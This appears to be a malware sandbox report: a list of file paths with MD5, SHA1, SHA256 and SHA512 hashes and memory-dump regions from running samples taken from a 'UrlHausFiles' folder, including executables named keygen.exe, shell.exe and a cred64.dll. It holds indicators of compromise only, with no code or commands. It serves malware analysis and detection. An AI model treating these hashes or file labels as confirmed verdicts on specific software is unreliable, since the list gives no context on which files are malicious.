C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico

MD5 505a174e740b3c0e7065c45a78b5cf42
SHA1 38911944f14a8b5717245c8e6bd1d48e58c7df12
SHA256 024ae694ba44ccd2e0914c5e8ee140e6cc7d25b3428d6380102ba09254b0857d
SHA512 7891e12c5ec14b16979f94da0c27ac4629bae45e31d9d1f58be300c4b2bbaee6c77585e534be531367f16826ecbaf8ec70fc13a02beaf36473c448248e4eb911

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb

MD5 3433ccf3e03fc35b634cd0627833b0ad
SHA1 789a43382e88905d6eb739ada3a8ba8c479ede02
SHA256 f7d5893372edaa08377cb270a99842a9c758b447b7b57c52a7b1158c0c202e6d
SHA512 21a29f0ef89fec310701dcad191ea4ab670edc0fc161496f7542f707b5b9ce619eb8b709a52073052b0f705d657e03a45be7560c80909e92ae7d5939ce688e9c

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

MD5 de45ebaf10bc27d47eb80a485d7b59f2
SHA1 ba534af149081e0d1b8f153287cd461dd3671ffd
SHA256 a746597e9b0877a8a6d4d919279045bfea2801d74348b034f222466c2200ea21
SHA512 9228255ae7df9c3a332cce8451cf9298298f4f3aab8a25fe334258d76f11cd2bdb069452381cfa68ec46b16a7371dd1e9ad6dfd69c293f068422eae953f2f22a

C:\Config.Msi\e595be3.rbs

MD5 d6737f9fb7f2928f8afba58b07d6af1d
SHA1 f32cf110d0dd0d0128198164d510b84bcfdd21ab
SHA256 2164e7493c2b6cc6ad30c78eafc38e6a2fe88a5047e63ecb5b2eb8d1f4906804
SHA512 a07d7a7278a678702aea7d3a9dd078ccdcf7cf0a8bc537838dc52f9cbb1b7c4a861df6a2c8a4d07251f8a5d649a8c454784fcb76f8c2a0d344cea906121ae4bc

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

MD5 2609215bb4372a753e8c5938cf6001fb
SHA1 ef1d238564be30f6080e84170fd2115f93ee9560
SHA256 1490105c73976217f35fe31d65939d1d9711d370c61f3d7d892afbb07eaaec63
SHA512 3892f3e4188250ab0d3508dd9c1825fa6dfab4fc50b4bc858703123e5512071d710fd8431f94912e74eaa4ca29b40c0b1b97805a5432a07fc09c35a87e6b23d2

memory/4972-3088-0x000001E3C8060000-0x000001E3C806A000-memory.dmp

memory/4972-3096-0x000001E3D08F0000-0x000001E3D0BF4000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

MD5 3bd08acd4079d75290eb1fb0c34ff700
SHA1 84d4d570c228271f14e42bbb96702330cc8c8c2d
SHA256 4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8
SHA512 42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760

memory/8512-3157-0x0000026953700000-0x00000269537B5000-memory.dmp

memory/8512-3155-0x0000026953440000-0x000002695345C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e5beb7985f353e3510d82aeabcd46b52
SHA1 d4c8fe6fe26ca27df410c194a06d8e3c6f638456
SHA256 95e805310f244571d7cdc5ebb05f074b4005a80bbaff9de7c1c7ff92c22fc2d0
SHA512 bd0c2ace38efa56aa2988293686707c9a1f2035d454a7876b2280179653c67d730a1642f9cd8677531637ad2556ab8b663aabbe8d32e7b2b7d7bee79ca6c29c7

memory/8512-3172-0x0000026953460000-0x000002695346A000-memory.dmp

memory/8512-3180-0x0000026953490000-0x00000269534AC000-memory.dmp

memory/8512-3181-0x0000026953470000-0x000002695347A000-memory.dmp

memory/8512-3182-0x00000269534D0000-0x00000269534EA000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe

MD5 8a2dc89841d6446317ecaab55c854bff
SHA1 9852e4ef42da54ea8f399946eefdc20df14299d3
SHA256 324cf60dacf248b91cda9793b5eba4fa3ce312fdaf99a20d721f515231b0357e
SHA512 28eeaf891e79051bdd4f55e34309992ccd45ff550ba4e5255d787614c43330f0f1881a7304c64709ff5973293e91934669cc4bfb63145649754064e825cf52e5

C:\Users\Admin\AppData\Local\Temp\nsi7D07.tmp\System.dll

MD5 b0a81b7b1bd6bbfe15e609df42791d22
SHA1 1b6f6726740b02aafdbe19cdc7b9dc5a2fdc4f75
SHA256 f9c47cf365f3607bc9abbce76839d02e6309a0d4389f1d2e0efb8d01e32459e9
SHA512 e105e7a3d4a908e59a8c8ab480d228bc4106e93f7fb833e6a5dea5ee0f2757c8617bda181324a059568d4b4c0b72b8628e60cf520c4f1b282305dbb34b5da194

C:\Users\Admin\AppData\Local\Temp\nsi7D07.tmp\nsExec.dll

MD5 2fd10d2f8ae885cc7e34ff21703aef6c
SHA1 7a1862a0240684a423c2d988557ab5b306af85e1
SHA256 e0959b690f25160d590cfd7e2467bb9ce7e9d959663e7e203f502dce5246507d
SHA512 fde884c9e988dd04a0e6b1e14b295e911b3d835ca92ed1a7a4c8bdc05326446092d17f75013a4ec9dc3e05cb351fd42b87d9ed96df70d0d5e4c9048f5fb5a546

C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe

MD5 1294efc398126f8169047f5b0ca4f42c
SHA1 23f821ba9cb594850e08dc83dec34e996c76261d
SHA256 4787cb304498193112cd43ccb22174bc8e9b8959fe8f462fa04456dea2e31a0a
SHA512 0355d48ad9daa380898c3653e6c55edc0dd188f23d4e44d8110ab316c3bc459d5837cae3d1ac6e2252fb5079b64cb8a27079c556dc416ec673a974c12f96e015

C:\Users\Admin\AppData\Local\Temp\FE816B.tmp

MD5 2be6e9df4a9f671f508c8df1a656e9c1
SHA1 66b490f1d6f1fce12a4d322c7a6575e2af0af2fe
SHA256 4ac76f3664fa0af1dac2f7a636273f8b4cfd10169359350832b854915c892eda
SHA512 f0f5620ebe00fcc17e2f1d3a670c3cf0fe0215719e422608bb083d4d1303a0fcdd63bd49b7a53d0773f2ff80eafae7e48a7662cb357cd46eb26cd6c1c6f6dfbd

C:\Users\Admin\AppData\Local\Temp\nsi7D07.tmp\nsInstall.dll

MD5 b0226b0a6420641a1ad20bd264ef0773
SHA1 d98ac9b823923991dad7c5bee33e87132616a5be
SHA256 77b9de16e105274d91379597dded837027a669d244138d7ca08274d89cf5fe43
SHA512 bdd25200b2c81eceba4206a404c58b15317f16fc748978848eb22a0db41e94153324915d0942277fccc490956b63bee5c148363f5982899e0a6a447531d212e8

C:\Users\Admin\Downloads\UrlHausFiles\test26.exe

MD5 b9054fcd207162b0728b5dfae1485bb7
SHA1 a687dc87c8fb69c7a6632c990145ae8d598113ce
SHA256 db032c18992b20def16589678eb07e0d3f74e971f4efc07196d7cd70a16753bc
SHA512 76e33c6b965ffb47f0a2838ca0571134cdf32ab9f6808bc21e6ca060b4d23e15cd686bd6d57571dbc613aa6e17a3702264079f2bc411de1a72a7d1e01afc469f

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

MD5 0e659115eeac35847249511e745615ad
SHA1 a2d8e3c435993ab4cc34aebc939b8c3f7ce845bb
SHA256 b9748126b7705527708eed86be3107e292421ca2bb8742f8c2abedba1c57728b
SHA512 dd2ae5d884cd6ed55d2083da14012289c2253284dbcaaa1126e5f2e06bd24f98056a1eadbcb16a12f020b3057dbf098eda74c3649f3a91adb681b5326125f5b3

C:\Users\Admin\AppData\Local\Temp\is-O375F.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-O375F.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi

MD5 5144f4f71644edb5f191e12264318c87
SHA1 09a72b5870726be33efb1bcf6018e3d68872cc6d
SHA256 403f98abad4a3d681466b21dc3e31eb1b37ef8ca34d6f15db675b9260efe0993
SHA512 977f10a82de75fc841040d96e3e343f7607427470aa69d6d5c365d97e34d8595120932eb52a65d48199816c1a16054c0bca2f18e13da8acfe8679d9da4a87e9a

C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll

MD5 436830b10b70f60fc5fbfaf0de1dbf65
SHA1 5aad41575619d74edaa16f984fb9538fa0fbe23e
SHA256 0995f62bb15b2ee4a631f66a3ebb41b09e81d137fa8390079764fb1d4210a49d
SHA512 5c7b882d6db67b3cc53ed53a4e826dc257001f887c1bd19f89aa28d1785a039c7c559613f4bef330def8e0efbdc676101acae617921f0c89f2d2a3192cc80616

C:\Users\Admin\Downloads\UrlHausFiles\bin.exe

MD5 1dcce19e1a6306424d073487af821ff0
SHA1 9de500775811f65415266689cbdfd035e167f148
SHA256 77e14caae3daf05c1f5a6a3d10e4936cc58944d6ae9ec6943b1be6d995e94b5c
SHA512 4528efd164bff904830fde7efb04d5cf3999ef4fa0b8c3d4ad0407d7cd75f03085107c8ae5651e015f62e414a59979fd264e94257c52f60540d5969fd4ca144a

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 16b50170fda201194a611ca41219be7d
SHA1 2ddda36084918cf436271451b49519a2843f403f
SHA256 a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a
SHA512 f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

MD5 126619fbbb061d7f4e5a595068249ce8
SHA1 97bce4d9b978f39b2695b4e3cd24b027f10de317
SHA256 f2e4a4a886757ce7e2492cbc509d2d29fad5674d037482057f3ee77986892198
SHA512 9ed6c43a15c6fc2c601a9151f65847f1f661fb9a8fff75d2c5d50ffd5d5d65c24459a6ef23d62e1196b05dcfca5af8c9522b3cc2622d5149e1815f6c3ebcd514

C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe

MD5 b519315ddb44cad0550edefbfde209c2
SHA1 8c5f1043749969472d88eb7faf0e1ef27f577ce1
SHA256 241609eb53dddcda9a50c95eabcebdce271912af427a0c5c716a63aceab3ee60
SHA512 1ff0f4963d615b41a1331f793bc2ebc3154230ce633432479f1a669224baec522c2679c524b19e25190fa0d5bb19d2b10497b79e7192be463127183fef09633d

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

MD5 4ed27cd391e16b0e256c76afc1f986c3
SHA1 e0d705f87f5b5334a81d18126b18a9a39f8b6d5e
SHA256 2096a5e42c046c360c7cd646309a0e7dbbaaed00e84e242166108464b7b0ca22
SHA512 7e9208d6782fa8ed08c4b896f314a535a5e38d18c4b66a2813698007d0efeea8014ef4c0bf4c139457c826d05eae4fd241c2db419a761b709f4f118bf0f9d1b6

C:\ProgramData\HIIIDAKKJJJK\IEHDBG

MD5 5ac11be6579e0e125ebdc085f79d894a
SHA1 e3eed80b034c4569511cd78736e3f746b2f0e637
SHA256 0da86edbeba1a1983d9e1261a74e85fd885c6b72d20f364176410580cd8235bf
SHA512 059c4f723f92710f96ad355f1e1e2b0a8fc163b9df486255e03b65916c5c0fe1df4ff85da66f03036e4ea4149e5d2beea4d63ee7472c0d53785d2cd0f402b931

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

MD5 390c469e624b980db3c1adff70edb6dd
SHA1 dc4e0bf153666b5ca2173f480a3b62c8b822aa85
SHA256 3bb815b5af569dbad7f8f4cccc8e82000ba9b3baedf92e510253af13d60a084a
SHA512 e9c8be87d6692480e4c9ca0717ffda8c3023846722c54a74384f80ecae91a8d16be460c78a58419c9fb6e4507faf5ffa66af6f5e57a15ef35e3244c431f2c1ac

C:\ProgramData\HIIIDAKKJJJK\EBFBKF

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2